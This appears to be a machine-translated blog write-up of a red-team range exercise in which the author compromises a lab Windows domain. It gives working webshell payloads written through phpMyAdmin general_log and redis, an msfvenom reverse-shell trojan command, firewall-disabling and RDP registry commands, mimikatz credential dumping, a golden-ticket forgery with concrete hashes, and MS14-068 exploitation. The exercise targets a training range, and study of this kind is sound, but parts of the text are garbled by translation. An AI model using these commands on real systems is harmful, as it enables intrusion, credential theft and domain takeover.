ATT&CK actual combat series - red team actual combat

Posted by Opticon on Mon, 31 Jan 2022 21:14:40 +0100

Environment construction

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Official description

The red team actual combat series mainly takes the real enterprise environment as an example to build a series of shooting ranges and learn through the trinity of practice, video tutorial and blog. In addition, the actual combat fully simulates the att & CK attack link to build a complete closed loop. The follow-up will also build a real APT actual combat environment and grow from actual combat. As for the environment, various actual combat routes can be simulated. At present, a set of attack actual combat routes given by the author are as follows. All unified passwords of the virtual machine are as follows: hongrisec@2019 :

1, Environment construction
1. Environment construction test
2. Information collection

2, Vulnerability exploitation
3. Vulnerability search and utilization
4. Background Getshell upload skills
5. System information collection
6. Host password collection

3, Intranet collection
7. Intranet - continue information collection
8. Intranet attack posture - Information Disclosure
9. Intranet attack posture-MS08-067
10. Intranet attack posture - SMB remote desktop password guessing
11. Intranet attack posture - TNS Service Vulnerability of Oracle Database
12. Intranet attack posture - RPC DCOM Service Vulnerability

4, Lateral movement
13. Other intranet host ports - file reading
14. Other intranet host ports - redis
15. Other intranet host ports - redis Getshell
16. Other intranet host ports - MySQL database
17. Other intranet host ports - MySQL authorization

5, Build channel
18. Other intranet host ports - proxy forwarding

6, Persistent control
19. Domain penetration - domain member information collection
20. Domain penetration - powershell for weak password detection and deep utilization of basic services
21. Domain penetration - lateral movement [wmi utilization]
22. Domain penetration - C2 command execution
23. Domain penetration - use DomainFronting to realize deep hiding of beacon
24. Domain penetration - implementation and utilization of domain control

7, Trace cleaning
25. Log cleaning

Network topology:

Local environment:

Configure the network environment and start phpstudy under win7

Penetration test part

web is php probe directly



Site backup file


phpmyadmin log getshell

No other findings yet
Blasting phpmyadmin
Burst to several empty passwords, but the empty password cannot log in

You do not have permission to read the file

A database of yxcms was found in phpmyadmin

Try to write a sentence,

select '<?php eval($_POST[pwd]); ?>' into outfile 'C:/phpStudy/WWW/shell.php'

Try modifying secure_file_priv but failed

show variables like "secure_file_priv";
set global secure_file_priv='';

Using mysql general_log_file upload a sentence

show variables like 'general%'

Turn on general_log log

set global general_log = 'ON'

General_ The log path is placed in the root directory of the website

set global general_log_file='C:/phpStudy/WWW/shell.php'

Because general_ The log will record the sql statements we executed, so a sentence we executed php will also be recorded. Because the suffix is changed to php, php encounters the php header <? You'll think it's a php file

Visit again and report a php error. Make sure it has been parsed by php, but there is a fatal error on line 940

Empty general_log log retry

set global general_log = 'OFF';
rename table mysql.general_log TO mysql.general_log2;
delete from mysql.general_log2;
show variables like 'general%'
rename table mysql.general_log2 TO mysql.general_log;
set global general_log = 'ON';
set global general_log_file='C:/phpStudy/WWW/shell2.php'
show variables like 'general%'
select '<?php eval($_POST[pwd]);?>';


The website divulges the background address and user password, and the user password is a weak password
Baidu queries the relevant directory structure and finds the back-end login page

yxcms related vulnerabilities are searched on the Internet and reproduced here

Front end XSS

Back end verification. After verification, the front end will also display

Write any file to getshell

New template

Get the upload point through the previously leaked backup file

Delete any file

You need to log in to the background first, and then access it. After that, it will show that the thumbnail does not exist

POST: picname=.../.../protected/apps/install/install.lock

Post infiltration stage

Online CS

start artifact.exe

This password is the default password

Raise rights to system users

Domain control information collection

View intranet segment

Domain controllers are generally DNS hosts


Query system architecture and install software

wmic product get name,version

Query domain list and all users

net view /domain
net user /domain

Query the time from the domain controller. If the current user is a domain user, the current time will be returned from the domain controller. It is also used to judge the primary domain. The primary domain is generally used as a time server
Then use net group "domain controllers" /domain to verify the domain controller

net time /domain
net group "domain controllers" /domain

The primary domain is OWA god. org

Password policy domain

net accounts /domain

Confirm domain control IP

Extraterritorial information collection and infiltration

Routing information

arp table


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Turn off firewall connection

netsh firewall set opmode disable

Add user

msf generate Trojan

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=7777 -f exe > shell.exe

local listen


Domain penetration

SMB Beacon C2 command execution

Create a listener

Log in using psexec

Obtain domain control OWA beacon

CS/MSF linkage

msf listening

CS create a new listener

Add session derivation
msf Online

Identify the 141 hosts of the previous arp

shell garbled

chcp 65001

Add route

run autoroute -s
run autoroute -p
run get_local_subnets

Run arp by the way

Scan port 141
Because Oracle and redis are included in the environment description, ports are added

There is 08067 in the description, but it can't be played. 17010 can be played, but the server will be played on the blue screen


138 the domain control host could not play, but it succeeded after closing the firewall

Turn off the firewall

netsh advfirewall set allprofiles state off

redis getshell

redis is actually a problem
Redis is mentioned in the official description, but it cannot be accessed by default. There is no other idea, so we have to modify the redis zero hour configuration file> config set protected-mode no

msf related redis module


138 the domain control target has opened 80 channels, which can be accessed directly through the previous route

Write webshell to the physical path through redis
At this time, redis only needs directory write permission
But without knowing the physical path, it is more difficult> config set dir C:\inetpub\wwwroot\
OK> config set dbfilename shell.aspx
OK> set x "<% @Page Language='Jscript'%><%eval(Request.Item['pwd'],'unsafe');%>"
OK> save

Gold note

Prerequisites for making gold notes

  1. Domain name
  2. SID of the domain
  3. Password hash value of krbtgt account of domain (NTLM or aes256_hmac)
  4. Forged user names can be arbitrary or even nonexistent

krbtgt user is the user used to manage the issuance of bills in domain control. With the permission of this user, you can forge any user in the system

The domain name has been collected in the front: God org

SID: whoami /user

Domain ID and krbtgt account hash

mimikatz # privilege::debug #(elevation of authority)
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords #(grab plaintext password and hash)
mimikatz # lsadump::dcsync / /user:krbtgt #Export krbtgt password hash
mimikatz # lsadump::dcsync / /all /csv #Export hash values of all user passwords in the domain:

SID of domain: S-1-5-21-2952760202-1353902439-2381784089-500
aes256_hmac: a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
NTLM: 58e91a5ac358d86513ab224312314061

"kerberos::golden /domain:<domain name> /sid:<field SID> /aes256:<aes256_hmac> /user:<Any user name> /ptt"
kerberos::golden / /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /aes256:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df /user:abc /ptt

Forged bill

CS can also forge bills

Forged bill information


MS14-068 is a privilege escalation vulnerability that enables ordinary users to obtain domain control privileges. It is a patch given by Microsoft
It's kb3011780. In domain controllers above server 2000, as long as this patch is not applied, it may be used.

Access to domain share denied

Generate bills using MS14-068

MS14-068.exe -u   Domain user@Domain control name  -p Domain user password -s Domain user sid -d field ip
MS14-068.exe -u -s S-1-5-21-2952760202-1353902439-2381784089-500 -p hongrisec@2021 -d

Delete the currently cached kerberos ticket before import

mimikatz # kerberos::purge
klist purge

Importing kerberos tickets using mimikatz

mimikatz # kerberos::ptc
C:\phpStudy\WWW>dir \\\C$

Topics: security Information Security